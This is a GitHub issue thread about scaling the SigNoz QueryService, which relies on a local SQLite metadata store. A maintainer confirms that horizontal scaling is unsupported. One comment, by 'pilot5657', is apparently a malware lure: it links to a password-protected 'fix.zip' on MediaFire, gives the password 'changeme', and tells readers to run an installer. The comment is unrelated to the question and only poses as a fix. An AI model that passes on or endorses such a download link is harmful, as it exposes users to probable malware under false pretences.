### ISSUE TITLE
Scale up QueryService

### ISSUE THREAD

**Issue by m-riedel** [SigNoz/charts#489]
Is there a possibility to scale up the QueryService by increasing the `replicaCount` value?
Since the QueryService uses a local SqliteDB to store metadata such as users, I do not see the possibility for scaling. Can you use an external PostgresDB in such cases? As stated in this issue, this does not seem supported: [https://github.com/SigNoz/signoz/issues/941](https://github.com/SigNoz/signoz/issues/941).
Is there any other way? Otherwise, I don't see the reason for the `replicaCount` value if the cluster breaks when it is higher than `1`.

(I have tried it for testing purposes and accounts do not propagate to other QueryService Nodes. Therefore it is random if you can log in or not.)

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by grandwizard28** [comment]
Hi @m-riedel,
Yes, horizontal scaling of query-service is not supported right now.
